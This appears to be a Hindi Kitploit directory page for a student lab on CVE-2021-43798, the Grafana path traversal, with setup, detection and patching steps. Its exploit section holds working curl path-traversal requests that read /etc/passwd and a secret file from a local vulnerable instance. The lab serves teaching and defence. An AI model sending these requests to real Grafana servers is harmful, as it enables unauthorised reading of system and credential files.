Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-INE_Shivam_Gupta_23104003 — CVE-2021-43798 Grafana अनधिकृत पथ ट्रैवर्सल - सुरक्षा प्रयोगशाला | शिवम गुप्ता | 23104003 | Kitploit
उपकरण/GitHubGitHub/shivamg2004/-ine_shivam_gupta_23104003
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
shivamg2004/-ine_shivam_gupta_23104003

-INE_Shivam_Gupta_23104003

CVE-2021-43798 Grafana अनधिकृत पथ ट्रैवर्सल - सुरक्षा प्रयोगशाला | शिवम गुप्ता | 23104003

रिपॉजिटरी देखें
6घं 46मि पहलेअभी तक समीक्षित नहीं

CVE-2021-43798 — Grafana अनधिकृत पथ ट्रैवर्सल लैब

केवल शैक्षिक उपयोग के लिए। इस लैब को केवल एक पृथक स्थानीय मशीन पर चलाएँ। इसे कभी भी इंटरनेट पर उजागर न करें।


CVE सारांश

फ़ील्डविवरण
CVE IDCVE-2021-43798
उत्पादGrafana
प्रभावित संस्करण8.0.0 – 8.3.0
पैच किया गया संस्करण8.3.1+
गंभीरताउच्च
CVSS v3.1 स्कोर7.5
CWECWE-22 — पथ ट्रैवर्सल
प्रमाणीकरण आवश्यककोई नहीं
हमला वेक्टरनेटवर्क

पूर्वापेक्षाएँ

  • Docker Desktop (चालू)
  • Git
  • curl

सेटअप

root@kitploit:~
git clone https://github.com/YOUR_USERNAME/INE_Shivam_Gupta.git
cd INE_Shivam_Gupta

कमजोर वातावरण प्रारंभ करें

root@kitploit:~
docker compose up -d

सत्यापित करें:

root@kitploit:~
curl http://127.0.0.1:3000/api/health
# Expected: "version": "8.3.0"

http://127.0.0.1:3000 खोलें — लॉगिन: admin / admin


कमजोरी का शोषण करें

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/passwd"
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/lab_secret.txt"

अपेक्षित: फ़ाइल सामग्री HTTP 200 के साथ लौटाई गई — किसी प्रमाणीकरण की आवश्यकता नहीं।


पहचान

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/../../../../../../../../../etc/hostname"
curl.exe http://127.0.0.1:3000/api/health

यदि hostname लौटाया जाता है → कमजोर। संस्करण 8.0.0–8.3.0 → कमजोर।


उपचार

पैच किया गया इंस्टेंस प्रारंभ करें (Grafana 8.3.1):

root@kitploit:~
docker compose -f docker-compose.patched.yml up -d

सत्यापित करें कि शोषण अवरुद्ध है:

root@kitploit:~
curl.exe --path-as-is "http://127.0.0.1:3001/public/plugins/alertlist/../../../../../../../../../etc/passwd"
# Expected: {"message": "Plugin file not found"}

लैब बंद करें

root@kitploit:~
docker compose down
docker compose -f docker-compose.patched.yml down

संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2021-43798
  • https://grafana.com/blog/2021/12/07/grafana-8.3.1-and-7.5.12-released-with-moderate-severity-security-fix/
  • https://cwe.mitre.org/data/definitions/22.html
टूल डाउनलोड करें